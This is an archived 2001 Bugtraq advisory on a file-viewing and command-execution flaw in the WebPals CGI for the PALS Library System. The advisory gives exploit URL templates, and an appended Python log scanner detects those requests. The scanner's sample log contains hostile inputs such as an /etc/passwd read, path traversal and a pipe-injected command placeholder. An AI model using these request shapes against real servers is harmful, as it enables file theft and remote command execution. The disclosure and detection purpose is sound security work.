Bugtraq mailing list archives
PALS Library System "show files" Vulnerability and remote command execution
From: UkR-XblP <cuctema () OK RU>
Date: Mon, 12 Feb 2001 17:17:46 +0300
Name: PALS Library System "show files" Vulnerability and remote command execution.
Date: 02.02.2001
About: This script is derived from an idea originated at St.Olaf College to provide a www interface to the PALS Library System. This idea was then worked on at Georgia State University. This version of WebPals has been written using their original idea.
Problem: Through this bug you can view any file and execute commands. The problem lies in the "pine pipe bug".
Author: UkR-XblP
Exploit:
http://www.victim.com/cgi-bin/pals-cgi?palsAction=restart&documentName=url_to_file
http://www.victim.com/pals-cgi?palsAction=restart&documentName=url_to_command
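Added example, not part of the original post or of WebPals: a defender-side scan of web access logs for the request shape given in the advisory (pals-cgi with palsAction=restart and a documentName value). The log lines are constructed, and the checks applied to documentName (absolute path, parent traversal, shell metacharacters, a plain-file-name allowlist) are assumptions, since the post gives only placeholders for the values.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (documentation IP range), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Feb/2001:10:00:01 +0300] "GET /cgi-bin/pals-cgi?palsAction=restart&documentName=help.html HTTP/1.0" 200 512
192.0.2.11 - - [12/Feb/2001:10:00:05 +0300] "GET /cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd HTTP/1.0" 200 1024
192.0.2.12 - - [12/Feb/2001:10:00:09 +0300] "GET /cgi-bin/pals-cgi?palsAction=restart&documentName=..%2F..%2Fconf%2Fsite.cfg HTTP/1.0" 200 300
192.0.2.13 - - [12/Feb/2001:10:00:12 +0300] "GET /pals-cgi?palsAction=restart&documentName=%7CCOMMAND_PLACEHOLDER HTTP/1.0" 200 40
192.0.2.14 - - [12/Feb/2001:10:00:15 +0300] "GET /index.html HTTP/1.0" 200 2048
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate documentName is a plain relative file name.
SAFE_NAME_RE = re.compile(r'^[A-Za-z0-9_][A-Za-z0-9_.-]*$')
SHELL_META_RE = re.compile(r'[|;&`$<>]')


def classify(document_name):
    """Return the reasons a decoded documentName looks suspicious (empty if benign)."""
    reasons = []
    if document_name.startswith(("/", "\\")):
        reasons.append("absolute-path")
    if ".." in document_name:
        reasons.append("parent-traversal")
    if SHELL_META_RE.search(document_name):
        reasons.append("shell-metacharacter")
    if not reasons and not SAFE_NAME_RE.match(document_name):
        reasons.append("outside-allowlist")
    return reasons


def scan(log_text):
    """Return (line number, client, decoded documentName, reasons) per flagged request."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/pals-cgi"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
        if "restart" not in params.get("palsAction", []):
            continue
        for value in params.get("documentName", []):
            reasons = classify(value)
            if reasons:
                findings.append((lineno, line.split()[0], value, reasons))
    return findings
```

Values are classified after percent-decoding, so encoded separators and metacharacters are caught as well as literal ones.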